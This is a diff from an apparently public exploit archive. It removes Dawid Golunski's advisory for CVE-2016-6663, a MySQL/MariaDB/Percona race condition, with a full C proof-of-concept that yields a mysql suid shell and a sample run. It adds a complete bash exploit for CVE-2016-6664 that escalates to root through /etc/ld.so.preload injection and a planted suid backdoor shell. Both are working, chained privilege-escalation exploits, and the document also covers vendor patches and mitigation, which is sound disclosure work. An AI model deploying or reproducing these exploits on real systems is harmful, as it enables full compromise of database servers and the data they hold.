-
-"MariaDB is one of the most popular database servers in the world. 
-It’s made by the original developers of MySQL and guaranteed to stay open source. 
-Notable users include Wikipedia, WordPress.com and Google.
-
-MariaDB turns data into structured information in a wide array of applications, 
-ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. 
-MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of 
-storage engines, plugins and many other tools make it very versatile for a wide 
-variety of use cases."
-
-https://mariadb.org/about/
-
---
-
-PerconaDB:
-
-"Percona Server for MySQL® is a free, fully compatible, enhanced, open source 
-drop-in replacement for MySQL that provides superior performance, scalability 
-and instrumentation. 
-With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support
-for extremely high-performance hardware delivers excellent performance and reliability."
-
-https://www.percona.com/software/mysql-database/percona-server
-
-
-III. INTRODUCTION
--------------------------
-
-An independent research has revealed a race condition vulnerability which is 
-present in MySQl, MariaDB and PerconaDB databases. 
-
-The vulnerability can allow a local system user with access to the affected 
-database in the context of a low-privileged account (CREATE/INSERT/SELECT grants) 
-to escalate their privileges and execute arbitrary code as the database system 
-user (typically 'mysql'). 
-
-Successful exploitation would allow an attacker to gain access to all of the 
-databases stored on the affected database server.
-
-The obtained level of access upon the exploitation, could be chained with
-the other privilege escalation vulnerabilities discovered by the author of
-this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges 
-from mysql user to root user and thus allow attackers to fully compromise the 
-target server.
-
-
-IV. DESCRIPTION
--------------------------
-
-
-Table locations
-~~~~~~~~~~~~~~~~~~
-
-MySQL-based databases allow users with CREATE table privilege to optionally
-specify a disk path of the directory where the table will be stored via a DATA 
-DIRECTORY parameter in the CREATE statement.
-
-Users who have access to a database account with CREATE grant could create a 
-table under a directory that they can control. For example:
-
-attacker@debian:~$ mkdir /tmp/disktable
-attacker@debian:~$ chmod 777 /tmp/disktable/
-attacker@debian:~$ ls -ld /tmp/disktable/
-drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/
-
-A user could then place a table within the directory with the following SQL 
-statement:
-
-mysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';
-
-which would result in creating the following table file:
-
-attacker@debian:~$ ls -l /tmp/disktable/
-total 0
--rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD
-
-
-Race Condition
-~~~~~~~~~~~~~~~~~~
-
-Observing file operations performed on the table stored within the directory, 
-it was discovered that REPAIR TABLE SQL statement which is available to 
-low-privileged users with SELECT/CREATE/INSERT grants, performed unsafe 
-operations on temporary files created during the table repair process.
-
-Executing the statement:
-
-mysql> REPAIR TABLE `poctab1`;
-+----------------+--------+----------+----------+
-| Table          | Op     | Msg_type | Msg_text |
-+----------------+--------+----------+----------+
-| testdb.poctab1 | repair | status   | OK       |
-+----------------+--------+----------+----------+
-
-would result in execution of the following system calls:
-
-[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
-[pid  1463] open("/tmp/disktable/poctab1.MYD", O_RDWR) = 65
-[pid  1463] access("./testdb/poctab1.TRG", F_OK) = -1 ENOENT (No such file or directory)
-[pid  1463] lseek(65, 0, SEEK_CUR)      = 0
-[pid  1463] lseek(65, 0, SEEK_END)      = 0
-[pid  1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0
-[pid  1463] open("/tmp/disktable/poctab1.TMD", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66
-[pid  1463] lseek(65, 0, SEEK_END)      = 0
-[pid  1463] lseek(64, 0, SEEK_END)      = 1024
-[pid  1463] close(65)                   = 0
-[pid  1463] close(66)                   = 0
-[pid  1463] lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
-[pid  1463] lstat("/tmp/disktable", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0
-[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
-[pid  1463] stat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
-[pid  1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0
-[pid  1463] chown("/tmp/disktable/poctab1.TMD", 110, 115) = 0
-[pid  1463] unlink("/tmp/disktable/poctab1.MYD") = 0
-[pid  1463] rename("/tmp/disktable/poctab1.TMD", "/tmp/disktable/poctab1.MYD") = 0
-
-
-The first call:
-
-[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
-
-was found to check file permissions of poctab1.MYD table which are then copied with chmod()
-to the newly created poctab1.TMD temporary file containing the repaired table.
-
-The code is vulnerable to Race Condition between the call:
-
-[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
-
-and
-
-[pid  1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0
-
-
-If an attacker managed to unlink the temporary table poctab1.TMD and replace it
-with a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), 
-they would be able to apply arbitrary permissions on the data directory. 
-The attacker would be able to control the set of permissions by pre-setting them on
-poctab1.MYD file before executing the REPAIR TABLE statement.
-For example, by setting the permissions of poctab1.MYD to 777 the data directory
-would become readable and writable to the attacker.
-
-
-Obtaining mysql-suid shell
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Apart from gaining access to arbitrary mysql files, the attacker could also 
-achieve arbitrary code execution in the context of mysql user (mysql shell).
-
-This could be done by first pre-setting permissions on poctab1.MYD to 04777 
-(suid), and winning the race so that the permissions get applied on a copy
-of a bash shell file through the vulnerable chmod() call effectively creating
-a shell that elevates their permissions after execution.
-
-There is only one problem. Their suid shell would remain to be owned by the 
-attacker's user id and not 'mysql' user. 
-
-To elevate their privileges, attacker would need to copy the bash shell to a 
-mysql-owned table file which are owned by mysql user.  However mysql table 
-files are not writable by other users making it impossible for attacker to save 
-the shell.
-
-This could be bypassed if attacker created a specially crafted directory 
-with a group sticky bit and then created a second table named 'poctab2' as
-follows:
-
-attacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/
-attacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/
-drwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/
-
-mysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';
-Query OK, 0 rows affected (0.00 sec)
-
-attacker@debian:/tmp/disktable$ ls -l /tmp/disktable/
-total 0
--rw-rw---- 1 mysql mysql    0 Oct 28 11:04 poctab1.MYD
--rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD
-
-As we can see poctab2.MYD table (thanks to the sticky bit (+s) on the permissions
-of the group on disktable directory)  has 'mysql' as the owner but 'attacker' 
-as the group. 
-Therefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file 
-and preserve the file owner.
-
-Finally, they could exploit the Race Condition again and have SUID + exec 
-permissions applied on poctab2.MYD which would then allow them to execute the suid 
-shell with elevated privileges of the mysql user.
-
-
-From mysql to root
-~~~~~~~~~~~~~~~~~~~~~~~~
-
-After obtaining a mysql suid shell, attackers could then exploit one of the 
-other MySQL vulnerabilities discovered by the author of this advisory:
-
-CVE-2016-6662 
-or
-CVE-2016-6664 (OCVE-2016-5617)
-
-to escalate their privileges from mysql user to root system user.
-
-
-
-
-V. PROOF OF CONCEPT EXPLOIT
--------------------------
-
-
-------------------[ mysql-privesc-race.c ]--------------------
-
-/*
-
-MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
-mysql-privesc-race.c (ver. 1.0)
-
-CVE-2016-6663 / OCVE-2016-5616
-
-Discovered/Coded by:
-
-Dawid Golunski
-
-dawid[at]legalhackers.com
-@dawid_golunski
-http://legalhackers.com
-
-
-Compile:
-gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
-
-Note:
-* On RedHat-based systems you might need to change /tmp to another public directory
-
-* For testing purposes only. Do no harm.  
-
-Full advisory URL:
-http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
-
-*/
-
-
-#include <fcntl.h>
-#include <grp.h>
-#include <mysql.h>
-#include <pwd.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/inotify.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <time.h>
-#include <unistd.h>
-
-
-#define EXP_PATH          "/tmp/mysql_privesc_exploit"
-#define EXP_DIRN          "mysql_privesc_exploit"
-#define MYSQL_TAB_FILE    EXP_PATH "/exploit_table.MYD"
-#define MYSQL_TEMP_FILE   EXP_PATH "/exploit_table.TMD"
-
-#define SUID_SHELL   	  EXP_PATH "/mysql_suid_shell.MYD"
-
-#define MAX_DELAY 1000    // can be used in the race to adjust the timing if necessary
-
-MYSQL *conn;		  // DB handles
-MYSQL_RES *res;
-MYSQL_ROW row;
-
-unsigned long cnt;
-
-
-void intro() {
-
-printf( 
-        "\033[94m\n"
-        "MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n"
-        "mysql-privesc-race.c (ver. 1.0)\n\n"
-        "CVE-2016-6663 / OCVE-2016-5616\n\n"
-        "For testing purposes only. Do no harm.\n\n"
-	"Discovered/Coded by:\n\n"
-	"Dawid Golunski \n"
-	"http://legalhackers.com"
-        "\033[0m\n\n");
-
-}
-
-void usage(char *argv0) {
-    intro();
-    printf("Usage:\n\n%s user pass db_host database\n\n", argv0);
-}
-
-void mysql_cmd(char *sql_cmd, int silent) {
-    
-    if (!silent) {
-	    printf("%s \n", sql_cmd);
-    }
-    if (mysql_query(conn, sql_cmd)) {
-        fprintf(stderr, "%s\n", mysql_error(conn));
-        exit(1);
-    }
-    res = mysql_store_result(conn);
-    if (res>0) mysql_free_result(res);
-
-}
-
-
-int main(int argc,char **argv)
-{
-
-    int randomnum = 0;
-    int io_notified = 0;
-    int myd_handle;
-    int wpid;
-    int is_shell_suid=0;
-    pid_t pid;
-    int status;
-    struct stat st;
-    /* io notify */
-    int fd;
-    int ret;
-    char buf[4096] __attribute__((aligned(8)));
-    int num_read;
-    struct inotify_event *event;
-    /* credentials */
-    char *user     = argv[1];
-    char *password = argv[2];
-    char *db_host  = argv[3];
-    char *database = argv[4];
-
-
-    // Disable buffering of stdout
-    setvbuf(stdout, NULL, _IONBF, 0);
-
-    // Get the params
-    if (argc!=5) {
-	usage(argv[0]);
-	exit(1);
-    } 
-    intro();
-    // Show initial privileges
-    printf("\n[+] Starting the exploit as: \n");
-    system("id");
-
-    // Connect to the database server with provided credentials
-    printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host);
-    conn = mysql_init(NULL);
-    if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {
-        fprintf(stderr, "%s\n", mysql_error(conn));
-        exit(1);
-    }
-
-    // Prepare tmp dir
-    printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN);
-    umask(000);
-    system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN);
-    system("chmod g+s /tmp/" EXP_DIRN );
-
-    // Prepare exploit tables :)
-    printf("\n[+] Creating mysql tables \n\n");
-    mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0);
-    mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0);
-    mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
-    mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
-
-    // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file
-    // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory
-    printf("\n[+] Copying bash into the mysql_suid_shell table.\n    After the exploitation the following file/table will be assigned SUID and executable bits : \n");
-    system("cp /bin/bash " SUID_SHELL);
-    system("ls -l " SUID_SHELL);
-
-    // Use inotify to get the timing right
-    fd = inotify_init();
-    if (fd < 0) {
-        printf("failed to inotify_init\n");
-        return -1;
-    }
-    ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);
-
-
-    /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */
-
-    printf("\n[+] Entering the race loop... Hang in there...\n");
-
-    while ( is_shell_suid != 1 ) {
-
-        cnt++;
-	if ( (cnt % 100) == 0 ) {
-	 	printf("->");
-	 	//fflush(stdout);	
-	}
-
-        /* Create empty file , remove if already exists */
-        unlink(MYSQL_TEMP_FILE);
-        unlink(MYSQL_TAB_FILE);
-   	mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1);
-	mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1);
-
-	/* random num if needed */
-        srand ( time(NULL) );
-        randomnum = ( rand() % MAX_DELAY );
-
-        // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink
-        pid = fork();
-        if (pid < 0) {
-            fprintf(stderr, "Fork failed :(\n");
-        }
-
-        /* Child process - executes REPAIR TABLE  SQL statement */
-        if (pid == 0) {
-            usleep(500);
-            unlink(MYSQL_TEMP_FILE);
-	    mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1);
-            // child stops here
-            exit(0);
-        }
-
-        /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */
-        if (pid > 0 ) {
-            io_notified = 0;
-
-            while (1) {
-                int processed = 0;
-                ret = read(fd, buf, sizeof(buf));
-                if (ret < 0) {
-                    break;
-                }
-                while (processed < ret) {
-                    event = (struct inotify_event *)(buf + processed);
-                    if (event->mask & IN_CLOSE) {
-                        if (!strcmp(event->name, "exploit_table.TMD")) {
-                            //usleep(randomnum);
-
-			    // Set the .MYD permissions to suid+exec before they get copied to the .TMD file 
-			    unlink(MYSQL_TAB_FILE);
-			    myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);
-			    close(myd_handle);
-			    chmod(MYSQL_TAB_FILE, 04777);
-
-			    // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec
-                            unlink(MYSQL_TEMP_FILE);
-                            symlink(SUID_SHELL, MYSQL_TEMP_FILE);
-                            io_notified=1;
-                        }
-                    }
-                    processed += sizeof(struct inotify_event);
-                }
-                if (io_notified) {
-                    break;
-                }
-            }
-
-
-            waitpid(pid, &status, 0);
-        }
-
-	// Check if SUID bit was set at the end of this attempt
-        if ( lstat(SUID_SHELL, &st) == 0 ) {
-	    if (st.st_mode & S_ISUID) {
-		is_shell_suid = 1;
-	    }
-        } 
-
-    }
-
-    printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt);
-    system("ls -l " SUID_SHELL);
-
-    printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n    Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n");
-    system(SUID_SHELL " -p -i ");
-    //system(SUID_SHELL " -p -c '/bin/bash -i -p'");
-
-    /* close MySQL connection and exit */
-    printf("\n[+] Job done. Exiting\n\n");
-    mysql_close(conn);
-    return 0;
-
-}
-
-
-------------------[ EOF ]--------------------
-
-
-
-Example run:
-~~~~~~~~~~~~~~
-
-attacker@xenial:~/mysql-exploit$ lsb_release -a
-No LSB modules are available.
-Distributor ID:	Ubuntu
-Description:	Ubuntu 16.04.1 LTS
-Release:	16.04
-Codename:	xenial
-
-attacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv
-ii  mariadb-server                     10.0.27-0ubuntu0.16.04.1          all          MariaDB database server (metapackage depending on the latest version)
-ii  mariadb-server-10.0                10.0.27-0ubuntu0.16.04.1          amd64        MariaDB database server binaries
-ii  mariadb-server-core-10.0           10.0.27-0ubuntu0.16.04.1          amd64        MariaDB database core server files
-
-attacker@xenial:~/mysql-exploit$ id
-uid=1001(attacker) gid=1001(attacker) groups=1001(attacker)
-
-attacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;'
-+-----------------------------------------------------------------------------------------------------------------+
-| Grants for attacker@localhost                                                                                   |
-+-----------------------------------------------------------------------------------------------------------------+
-| GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' |
-| GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost'                                       |
-+-----------------------------------------------------------------------------------------------------------------+
-
-attacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.*
-ls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied
-
-attacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb
-
-MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
-mysql-privesc-race.c (ver. 1.0)
-
-CVE-2016-6663 / OCVE-2016-5616
-
-For testing purposes only. Do no harm.
-
-Discovered/Coded by:
-
-Dawid Golunski 
-http://legalhackers.com
-
-
-[+] Starting the exploit as: 
-uid=1001(attacker) gid=1001(attacker) groups=1001(attacker)
-
-[+] Connecting to the database `pocdb` as attacker@localhost
-
-[+] Creating exploit temp directory /tmp/mysql_privesc_exploit
-
-[+] Creating mysql tables 
-
-DROP TABLE IF EXISTS exploit_table 
-DROP TABLE IF EXISTS mysql_suid_shell 
-CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 
-CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 
-
-[+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : 
--rw-rw---- 1 mysql attacker 1037528 Nov  1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
-
-[+] Entering the race loop... Hang in there...
-
-
-[+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: 
-
--rwsrwxrwx 1 mysql attacker 1037528 Nov  1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
-
-[+] Spawning the mysql SUID shell now... 
-    Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)
-
-mysql_suid_shell.MYD-4.3$ whoami
-mysql
-mysql_suid_shell.MYD-4.3$ id
-uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)
-mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.*
--rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm
--rw-rw---- 1 mysql mysql  168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD
--rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI
-mysql_suid_shell.MYD-4.3$ exit
-exit
-
-[+] Job done. Exiting
-
-
-real	0m28.999s
-user	0m0.016s
-sys	0m0.016s
-
-
-
-
-Video PoC:
-~~~~~~~~~~~~
-http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
-
-
-
-VI. BUSINESS IMPACT
--------------------------
-
-Malicious local users with DB access granted a common set of privileges 
-(SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary 
-code and escalate their privileges to mysql system user. This would allow them 
-to gain access to all of the databases stored on the server as well as exploit 
-CVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges
-to root system user (rootshell) and fully compromise the target server.
-
-This vulnerability could for example be exploited by malicious users in a shared 
-hosting environment where each user is supposed to have access to only one 
-database assigned to them. 
-It could also be exploited by attackers who have managed to find a vulnerability
-in a website and gained access to the target system as a low-privileged user
-(such as apache/www-data).
-
- 
-VII. SYSTEMS AFFECTED
--------------------------
-
-MariaDB 
-	< 5.5.52
-	< 10.1.18
-        < 10.0.28
-
-MySQL  
-	<= 5.5.51
-	<= 5.6.32
-	<= 5.7.14
-
-Percona Server
-	< 5.5.51-38.2
-	< 5.6.32-78-1
-	< 5.7.14-8
-
-Percona XtraDB Cluster
-	< 5.6.32-25.17
-	< 5.7.14-26.17
-	< 5.5.41-37.0
-
-
-
-When checking if your system contains the patches, note that this vulnerability 
-has been known under two CVE IDs: 
-
-CVE-2016-6663
-CVE-2016-5616
-
-CVE-2016-6663 is the original CVE that was agreed to be used by all the
-affected vendors. 
-The issue was however mentioned in Oracle CPU mistakenly under a new CVE of
-CVE-2016-5616, resulting in a duplicate. Oracle has informed that CPU will be 
-updated to state that CVE-2016-5616 is equivalent to CVE-2016-6663.
-
- 
-VIII. SOLUTION
--------------------------
-
-MariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in
-advance which allowed them to produce patches for this vulnerability before
-disclosure.
-
-Update to security releases issued by the vendor.
-
-As a temporary mitigation, you can disable symbolic link support in the
-database server configuration with the following my.cnf config setting:
-
-symbolic-links = 0
-
-Nevertheless, an update to a patched release is recommended.
-
- 
-IX. REFERENCES
--------------------------
-
-http://legalhackers.com
-
-This advisory (CVE-2016-6663 / OCVE-2016-5616):
-http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
-
-Exploit (mysql-privesc-race.c) source code URL:
-http://legalhackers.com/exploits/mysql-privesc-race.c
-
-Video PoC:
-http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
-
-Advisory for CVE-2016-6664 / OCVE-2016-5617:
-http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
-
-
-Vendor updates:
-
-http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL
-http://www.mysql.com/
-
-https://mariadb.org/about/
-https://mariadb.com/kb/en/mdb-5552-rn/
-https://mariadb.com/kb/en/mdb-10118-rn/
-https://mariadb.com/kb/en/mdb-10028-rn/
-
-https://www.percona.com/software
-
-
-X. CREDITS
--------------------------
-
-The vulnerability has been discovered by Dawid Golunski
-dawid (at) legalhackers (dot) com
-
-http://legalhackers.com
- 
-
-XI. REVISION HISTORY
--------------------------
-
-01.11.2016 - Advisory released
-
- 
-XII. LEGAL NOTICES
--------------------------
-
-The information contained within this advisory is supplied "as-is" with
-no warranties or guarantees of fitness of use or otherwise. I accept no
-responsibility for any damage caused by the use or misuse of this information.
\ No newline at end of file
diff --git a/platforms/linux/local/40679.sh b/platforms/linux/local/40679.sh
new file mode 100755
index 000000000..5ce1a6d44
--- /dev/null
+++ b/platforms/linux/local/40679.sh
@@ -0,0 +1,206 @@
+#!/bin/bash -p
+#
+# Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
+#
+# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit
+# mysql-chowned.sh (ver. 1.0)
+#
+# CVE-2016-6664 / OCVE-2016-5617
+#
+# Discovered and coded by:
+#
+# Dawid Golunski
+# dawid[at]legalhackers.com
+#
+# https://legalhackers.com
+#
+# Follow https://twitter.com/dawid_golunski for updates on this advisory.
+#
+# This PoC exploit allows attackers to (instantly) escalate their privileges
+# from mysql system account to root through unsafe error log handling.
+# The exploit requires that file-based logging has been configured (default).
+# To confirm that syslog logging has not been enabled instead use:
+# grep -r syslog /etc/mysql
+# which should return no results.
+#
+# This exploit can be chained with the following vulnerability:
+# CVE-2016-6663 / OCVE-2016-5616
+# which allows attackers to gain access to mysql system account (mysql shell).
+#
+# In case database server has been configured with syslog you may also use:
+# CVE-2016-6662 as an alternative to this exploit.
+#
+# Usage:
+# ./mysql-chowned.sh path_to_error.log 
+#
+#
+# See the full advisory for details at:
+# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
+#
+# Video PoC:
+# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
+#
+#
+# Disclaimer:
+# For testing purposes only. Do no harm.
+#
+
+BACKDOORSH="/bin/bash"
+BACKDOORPATH="/tmp/mysqlrootsh"
+PRIVESCLIB="/tmp/privesclib.so"
+PRIVESCSRC="/tmp/privesclib.c"
+SUIDBIN="/usr/bin/sudo"
+
+function cleanexit {
+	# Cleanup 
+	echo -e "\n[+] Cleaning up..."
+	rm -f $PRIVESCSRC
+	rm -f $PRIVESCLIB
+	rm -f $ERRORLOG
+	touch $ERRORLOG
+	if [ -f /etc/ld.so.preload ]; then
+		echo -n > /etc/ld.so.preload
+	fi
+	echo -e "\n[+] Job done. Exiting with code $1 \n"
+	exit $1
+}
+
+function ctrl_c() {
+        echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
+	cleanexit 0
+}
+
+#intro 
+echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n"
+echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
+
+# Args
+if [ $# -lt 1 ]; then
+	echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"
+	echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"
+	exit 3
+fi
+
+# Priv check
+
+echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m"
+id | grep -q mysql 
+if [ $? -ne 0 ]; then
+	echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n"
+	exit 3
+fi
+
+# Set target paths
+ERRORLOG="$1"
+if [ ! -f $ERRORLOG ]; then
+	echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n"
+	exit 3
+fi
+echo -e "\n[+] Target MySQL log file set to $ERRORLOG"
+
+# [ Active exploitation ]
+
+trap ctrl_c INT
+# Compile privesc preload library
+echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
+cat <<_solibeof_>$PRIVESCSRC
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <dlfcn.h>
+       #include <sys/types.h>
+       #include <sys/stat.h>
+       #include <fcntl.h>
+
+uid_t geteuid(void) {
+	static uid_t  (*old_geteuid)();
+	old_geteuid = dlsym(RTLD_NEXT, "geteuid");
+	if ( old_geteuid() == 0 ) {
+		chown("$BACKDOORPATH", 0, 0);
+		chmod("$BACKDOORPATH", 04777);
+		//unlink("/etc/ld.so.preload");
+	}
+	return old_geteuid();
+}
+_solibeof_
+/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
+if [ $? -ne 0 ]; then
+	echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
+	cleanexit 2;
+fi
+
+
+# Prepare backdoor shell
+cp $BACKDOORSH $BACKDOORPATH
+echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
+
+# Safety check
+if [ -f /etc/ld.so.preload ]; then
+	echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
+	exit 2
+fi
+
+# Symlink the log file to /etc
+rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
+if [ $? -ne 0 ]; then
+	echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
+	cleanexit 3
+fi
+echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`"
+
+# Wait for MySQL to re-open the logs
+echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n"
+read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER
+if [ "$THE_ANSWER" = "y" ]; then
+	echo -e "Got it. Executing 'killall mysqld' now..."
+	killall mysqld
+fi
+while :; do 
+	sleep 0.1
+	if [ -f /etc/ld.so.preload ]; then
+		echo $PRIVESCLIB > /etc/ld.so.preload
+		rm -f $ERRORLOG
+		break;
+	fi
+done
+
+# /etc/	dir should be owned by mysql user at this point
+# Inject the privesc.so shared library to escalate privileges
+echo $PRIVESCLIB > /etc/ld.so.preload
+echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`"
+echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
+echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
+chmod 755 /etc/ld.so.preload
+
+# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
+echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
+sudo 2>/dev/null >/dev/null
+
+#while :; do 
+#	sleep 0.1
+#	ps aux | grep mysqld | grep -q 'log-error'
+#	if [ $? -eq 0 ]; then
+#		break;
+#	fi
+#done
+
+# Check for the rootshell
+ls -l $BACKDOORPATH
+ls -l $BACKDOORPATH | grep rws | grep -q root
+if [ $? -eq 0 ]; then 
+	echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
+	echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m"
+else
+	echo -e "\n[!] Failed to get root"
+	cleanexit 2
+fi
+
+
+# Execute the rootshell
